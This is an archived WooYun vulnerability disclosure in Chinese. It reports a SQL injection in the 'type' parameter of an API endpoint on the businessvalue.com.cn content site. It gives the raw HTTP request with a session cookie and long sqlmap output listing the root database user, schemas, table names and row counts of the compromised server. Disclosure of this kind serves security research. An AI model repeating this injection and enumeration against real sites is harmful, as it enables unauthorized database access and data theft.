乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开
极客公园同服务器网站商业价值主站存在SQL注入漏洞OneMore<ROOT>可脱全网库http://www.wooyun.org/bugs/wooyun-2015-092526 20Rank 猪猪侠说心塞,我不要心塞 20可好- - !
http://content.businessvalue.com.cn
POST /api/post_lr HTTP/1.1Content-Length: 139Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://content.businessvalue.com.cn:80/Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2286be272ed2107c3aba1526957614092f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.58%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F28.0.1500.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1425517199%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22total_socre%22%3Bi%3A0%3B%7D7258cc2e8ce688f3d57842918d8e60f8Host: content.businessvalue.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*type=1
参数:type
本来想看看counts,结果太多了,不想等,速度还是杠杠滴
web server operating system: Windows 7web application technology: Apache 2.2.22, PHP 5.3.27back-end DBMS: MySQL 5.0[09:20:23] [INFO] retrieved: root@localhostcurrent user: 'root@localhost'current database: 'content2014'[09:32:19] [INFO] retrieved: tchw[09:32:20] [INFO] retrieved: wp_options[09:32:20] [INFO] retrieved: tchw[09:32:20] [INFO] retrieved: wp_postmeta[09:32:21] [INFO] retrieved: tchw[09:32:21] [INFO] retrieved: wp_posts[09:32:21] [INFO] retrieved: tchw[09:32:21] [INFO] retrieved: wp_term_relationships[09:32:21] [INFO] retrieved: tchw[09:32:22] [INFO] retrieved: wp_term_taxonomy[09:32:22] [INFO] retrieved: tchw[09:32:22] [INFO] retrieved: wp_terms[09:32:22] [INFO] retrieved: tchw[09:32:23] [INFO] retrieved: wp_usermeta[09:32:23] [INFO] retrieved: tchw[09:32:23] [INFO] retrieved: wp_users[09:32:23] [INFO] retrieved: tchw[09:32:23] [INFO] retrieved: wx_menus[09:32:24] [INFO] retrieved: tchw_english[09:32:24] [INFO] retrieved: pre_add_admin[09:32:24] [INFO] retrieved: tchw_english[09:32:24] [INFO] retrieved: pre_add_module[09:32:24] [INFO] retrieved: tchw_english[09:32:25] [INFO] retrieved: pre_add_portal_module[09:32:25] [INFO] retrieved: tchw_english[09:32:25] [INFO] retrieved: pre_amy_user_setting[09:32:25] [INFO] retrieved: tchw_english[09:32:25] [INFO] retrieved: pre_common_admincp_cmenu[09:32:25] [INFO] retrieved: tchw_english[09:32:26] [INFO] retrieved: pre_common_admincp_group[09:32:26] [INFO] retrieved: tchw_english[09:32:26] [INFO] retrieved: pre_common_admincp_member[09:32:27] [INFO] retrieved: tchw_english[09:32:27] [INFO] retrieved: pre_common_admincp_perm[09:32:27] [INFO] retrieved: tchw_english[09:32:27] [INFO] retrieved: pre_common_admincp_session[09:32:27] [INFO] retrieved: tchw_english[09:32:28] [INFO] retrieved: pre_common_admingroup[09:32:28] [INFO] retrieved: tchw_english[09:32:28] [INFO] retrieved: pre_common_adminnote[09:32:29] [INFO] retrieved: tchw_english[09:32:29] [INFO] retrieved: pre_common_advertisement[09:32:29] [INFO] retrieved: tchw_english[09:32:29] [INFO] retrieved: pre_common_advertisement_custom[09:32:29] [INFO] retrieved: tchw_english[09:32:30] [INFO] retrieved: pre_common_banned[09:32:30] [INFO] retrieved: tchw_english[09:32:30] [INFO] retrieved: pre_common_block[09:32:30] [INFO] retrieved: tchw_english[09:32:30] [INFO] retrieved: pre_common_block_favorite[09:32:31] [INFO] retrieved: tchw_english[09:32:31] [INFO] retrieved: pre_common_block_item[09:32:31] [INFO] retrieved: tchw_english[09:32:31] [INFO] retrieved: pre_common_block_item_data[09:32:32] [INFO] retrieved: tchw_english[09:32:32] [INFO] retrieved: pre_common_block_permission[09:32:32] [INFO] retrieved: tchw_english[09:32:32] [INFO] retrieved: pre_common_block_pic[09:32:33] [INFO] retrieved: tchw_english[09:32:33] [INFO] retrieved: pre_common_block_style[09:32:33] [INFO] retrieved: tchw_english[09:32:33] [INFO] retrieved: pre_common_block_xml[09:32:33] [INFO] retrieved: tchw_english[09:32:34] [INFO] retrieved: pre_common_cache[09:32:34] [INFO] retrieved: tchw_english[09:32:34] [INFO] retrieved: pre_common_card[09:32:34] [INFO] retrieved: tchw_english[09:32:35] [INFO] retrieved: pre_common_card_log[09:32:35] [INFO] retrieved: tchw_english[09:32:35] [INFO] retrieved: pre_common_card_type[09:32:35] [INFO] retrieved: tchw_english[09:32:35] [INFO] retrieved: pre_common_connect_guest[09:32:35] [INFO] retrieved: tchw_english[09:32:36] [INFO] retrieved: pre_common_credit_log[09:32:36] [INFO] retrieved: tchw_english[09:32:36] [INFO] retrieved: pre_common_credit_log_field[09:32:37] [INFO] retrieved: tchw_english[09:32:37] [INFO] retrieved: pre_common_credit_rule[09:32:37] [INFO] retrieved: tchw_english[09:32:37] [INFO] retrieved: pre_common_credit_rule_log[09:32:37] [INFO] retrieved: tchw_english[09:32:38] [INFO] retrieved: pre_common_credit_rule_log_field[09:32:38] [INFO] retrieved: tchw_english[09:32:38] [INFO] retrieved: pre_common_cron[09:32:38] [INFO] retrieved: tchw_english[09:32:39] [INFO] retrieved: pre_common_devicetoken[09:32:39] [INFO] retrieved: tchw_english[09:32:39] [INFO] retrieved: pre_common_district[09:32:40] [INFO] retrieved: tchw_english[09:32:40] [INFO] retrieved: pre_common_diy_data[09:32:40] [INFO] retrieved: tchw_english[09:32:40] [INFO] retrieved: pre_common_domain[09:32:40] [INFO] retrieved: tchw_english[09:32:41] [INFO] retrieved: pre_common_failedip[09:32:41] [INFO] retrieved: tchw_english[09:32:41] [INFO] retrieved: pre_common_failedlogin[09:32:42] [INFO] retrieved: tchw_english[09:32:42] [INFO] retrieved: pre_common_friendlink[09:32:42] [INFO] retrieved: tchw_english[09:32:42] [INFO] retrieved: pre_common_grouppm[09:32:43] [INFO] retrieved: tchw_english[09:32:43] [INFO] retrieved: pre_common_invite[09:32:43] [INFO] retrieved: tchw_english[09:32:43] [INFO] retrieved: pre_common_magic[09:32:43] [INFO] retrieved: tchw_english[09:32:43] [INFO] retrieved: pre_common_magiclog[09:32:44] [INFO] retrieved: tchw_english[09:32:44] [INFO] retrieved: pre_common_mailcron[09:32:44] [INFO] retrieved: tchw_english[09:32:44] [INFO] retrieved: pre_common_mailqueue[09:32:44] [INFO] retrieved: tchw_english[09:32:45] [INFO] retrieved: pre_common_member[09:32:45] [INFO] retrieved: tchw_english[09:32:45] [INFO] retrieved: pre_common_member_action_log[09:32:45] [INFO] retrieved: tchw_english[09:32:46] [INFO] retrieved: pre_common_member_connect[09:32:46] [INFO] retrieved: tchw_english[09:32:46] [INFO] retrieved: pre_common_member_count[09:32:46] [INFO] retrieved: tchw_english[09:32:50] [INFO] retrieved: pre_common_member_crime[09:32:50] [INFO] retrieved: tchw_english[09:32:50] [INFO] retrieved: pre_common_member_field_forum[09:32:51] [INFO] retrieved: tchw_english[09:32:51] [INFO] retrieved: pre_common_member_field_home[09:32:51] [INFO] retrieved: tchw_english[09:32:51] [INFO] retrieved: pre_common_member_forum_buylog[09:32:52] [INFO] retrieved: tchw_english[09:32:52] [INFO] retrieved: pre_common_member_grouppm[09:32:52] [INFO] retrieved: tchw_english[09:32:52] [INFO] retrieved: pre_common_member_log[09:32:53] [INFO] retrieved: tchw_english[09:32:53] [INFO] retrieved: pre_common_member_magic[09:32:53] [INFO] retrieved: tchw_english[09:32:53] [INFO] retrieved: pre_common_member_medal[09:32:54] [INFO] retrieved: tchw_english[09:32:54] [INFO] retrieved: pre_common_member_newprompt[09:32:54] [INFO] retrieved: tchw_english[09:32:54] [INFO] retrieved: pre_common_member_profile[09:32:54] [INFO] retrieved: tchw_english[09:32:55] [INFO] retrieved: pre_common_member_profile_setting[09:32:55] [INFO] retrieved: tchw_english[09:32:55] [INFO] retrieved: pre_common_member_security[09:32:55] [INFO] retrieved: tchw_english[09:32:56] [INFO] retrieved: pre_common_member_secwhite[09:32:56] [INFO] retrieved: tchw_english[09:32:56] [INFO] retrieved: pre_common_member_stat_field[09:32:57] [INFO] retrieved: tchw_english[09:32:57] [INFO] retrieved: pre_common_member_status[09:32:57] [INFO] retrieved: tchw_english[09:32:57] [INFO] retrieved: pre_common_member_validate[09:32:57] [INFO] retrieved: tchw_english[09:32:57] [INFO] retrieved: pre_common_member_verify[09:32:58] [INFO] retrieved: tchw_english[09:32:58] [INFO] retrieved: pre_common_member_verify_info[09:32:58] [INFO] retrieved: tchw_english[09:32:58] [INFO] retrieved: pre_common_myapp[09:32:59] [INFO] retrieved: tchw_english[09:32:59] [INFO] retrieved: pre_common_myinvite[09:32:59] [INFO] retrieved: tchw_english[09:32:59] [INFO] retrieved: pre_common_mytask[09:33:00] [INFO] retrieved: tchw_english[09:33:00] [INFO] retrieved: pre_common_nav[09:33:00] [INFO] retrieved: tchw_english[09:33:00] [INFO] retrieved: pre_common_onlinetime[09:33:01] [INFO] retrieved: tchw_english[09:33:01] [INFO] retrieved: pre_common_optimizer[09:33:01] [INFO] retrieved: tchw_english[09:33:01] [INFO] retrieved: pre_common_patch[09:33:01] [INFO] retrieved: tchw_english[09:33:02] [INFO] retrieved: pre_common_plugin[09:33:02] [INFO] retrieved: tchw_english[09:33:02] [INFO] retrieved: pre_common_pluginvar[09:33:02] [INFO] retrieved: tchw_english[09:33:03] [INFO] retrieved: pre_common_process[09:33:03] [INFO] retrieved: tchw_english[09:33:03] [INFO] retrieved: pre_common_regip[09:33:03] [INFO] retrieved: tchw_english[09:33:04] [INFO] retrieved: pre_common_relatedlink[09:33:04] [INFO] retrieved: tchw_english[09:33:04] [INFO] retrieved: pre_common_remote_port[09:33:04] [INFO] retrieved: tchw_english[09:33:04] [INFO] retrieved: pre_common_report[09:33:05] [INFO] retrieved: tchw_english[09:33:05] [INFO] retrieved: pre_common_searchindex[09:33:05] [INFO] retrieved: tchw_english[09:33:05] [INFO] retrieved: pre_common_seccheck[09:33:05] [INFO] retrieved: tchw_english[09:33:05] [INFO] retrieved: pre_common_secquestion[09:33:06] [INFO] retrieved: tchw_english[09:33:06] [INFO] retrieved: pre_common_session[09:33:06] [INFO] retrieved: tchw_english[09:33:06] [INFO] retrieved: pre_common_setting[09:33:06] [INFO] retrieved: tchw_english[09:33:07] [INFO] retrieved: pre_common_smiley[09:33:07] [INFO] retrieved: tchw_english[09:33:07] [INFO] retrieved: pre_common_sphinxcounter[09:33:07] [INFO] retrieved: tchw_english[09:33:07] [INFO] retrieved: pre_common_stat[09:33:08] [INFO] retrieved: tchw_english[09:33:11] [INFO] retrieved: pre_common_statuser[09:33:11] [INFO] retrieved: tchw_english[09:33:11] [INFO] retrieved: pre_common_style[09:33:12] [INFO] retrieved: tchw_english[09:33:12] [INFO] retrieved: pre_common_stylevar[09:33:12] [INFO] retrieved: tchw_english[09:33:12] [INFO] retrieved: pre_common_syscache[09:33:13] [INFO] retrieved: tchw_english[09:33:13] [INFO] retrieved: pre_common_tag[09:33:13] [INFO] retrieved: tchw_english[09:33:13] [INFO] retrieved: pre_common_tagitem[09:33:13] [INFO] retrieved: tchw_english[09:33:14] [INFO] retrieved: pre_common_task[09:33:14] [INFO] retrieved: tchw_english[09:33:14] [INFO] retrieved: pre_common_taskvar[09:33:14] [INFO] retrieved: tchw_english[09:33:14] [INFO] retrieved: pre_common_template[09:33:15] [INFO] retrieved: tchw_english[09:33:15] [INFO] retrieved: pre_common_template_block[09:33:15] [INFO] retrieved: tchw_english[09:33:15] [INFO] retrieved: pre_common_template_permission[09:33:15] [INFO] retrieved: tchw_english[09:33:16] [INFO] retrieved: pre_common_uin_black[09:33:16] [INFO] retrieved: tchw_english[09:33:16] [INFO] retrieved: pre_common_usergroup[09:33:16] [INFO] retrieved: tchw_english[09:33:17] [INFO] retrieved: pre_common_usergroup_field[09:33:17] [INFO] retrieved: tchw_english[09:33:17] [INFO] retrieved: pre_common_visit[09:33:17] [INFO] retrieved: tchw_english[09:33:17] [INFO] retrieved: pre_common_word[09:33:18] [INFO] retrieved: tchw_english[09:33:18] [INFO] retrieved: pre_common_word_type[09:33:18] [INFO] retrieved: tchw_english[09:33:18] [INFO] retrieved: pre_connect_disktask[09:33:18] [INFO] retrieved: tchw_english[09:33:19] [INFO] retrieved: pre_connect_feedlog[09:33:19] [INFO] retrieved: tchw_english[09:33:19] [INFO] retrieved: pre_connect_memberbindlog[09:33:19] [INFO] retrieved: tchw_english[09:33:19] [INFO] retrieved: pre_connect_postfeedlog[09:33:20] [INFO] retrieved: tchw_english[09:33:20] [INFO] retrieved: pre_connect_tthreadlog[09:33:20] [INFO] retrieved: tchw_english[09:33:20] [INFO] retrieved: pre_forum_access[09:33:20] [INFO] retrieved: tchw_english[09:33:21] [INFO] retrieved: pre_forum_activity[09:33:21] [INFO] retrieved: tchw_english[09:33:21] [INFO] retrieved: pre_forum_activityapply[09:33:21] [INFO] retrieved: tchw_english[09:33:22] [INFO] retrieved: pre_forum_announcement[09:33:22] [INFO] retrieved: tchw_english[09:33:23] [INFO] retrieved: pre_forum_attachment[09:33:23] [INFO] retrieved: tchw_english[09:33:23] [INFO] retrieved: pre_forum_attachment_0[09:33:23] [INFO] retrieved: tchw_english[09:33:24] [INFO] retrieved: pre_forum_attachment_1[09:33:24] [INFO] retrieved: tchw_english[09:33:24] [INFO] retrieved: pre_forum_attachment_2[09:33:24] [WARNING] user aborted during enumeration. sqlmap will output[09:33:24] [INFO] retrieved: 14929[09:33:25] [INFO] retrieved: 6791[09:33:25] [INFO] retrieved: 18295[09:33:25] [INFO] retrieved: 4409[09:33:25] [INFO] retrieved: 312[09:33:25] [INFO] retrieved: 6790[09:33:26] [INFO] retrieved: 4[09:33:26] [INFO] retrieved: 5652[09:33:26] [INFO] retrieved: 0[09:33:26] [INFO] retrieved: 667[09:33:27] [INFO] retrieved: 0[09:33:27] [INFO] retrieved: 0[09:33:27] [INFO] retrieved: 9711[09:33:27] [INFO] retrieved: 24504[09:33:27] [INFO] retrieved: 0[09:33:28] [INFO] retrieved: 8[09:33:28] [INFO] retrieved: 5[09:33:28] [INFO] retrieved: 16[09:33:28] [INFO] retrieved: 100[09:33:29] [INFO] retrieved: 441[09:33:29] [INFO] retrieved: 25[09:33:29] [INFO] retrieved: 55[09:33:29] [INFO] retrieved: 0[09:33:30] [INFO] retrieved: 1[09:33:30] [INFO] retrieved: 15[09:33:30] [INFO] retrieved: 7[09:33:30] [INFO] retrieved: 387[09:33:31] [INFO] retrieved: 179[09:33:31] [INFO] retrieved: 18[09:33:31] [INFO] retrieved: 574
未能联系到厂商或者厂商积极拒绝
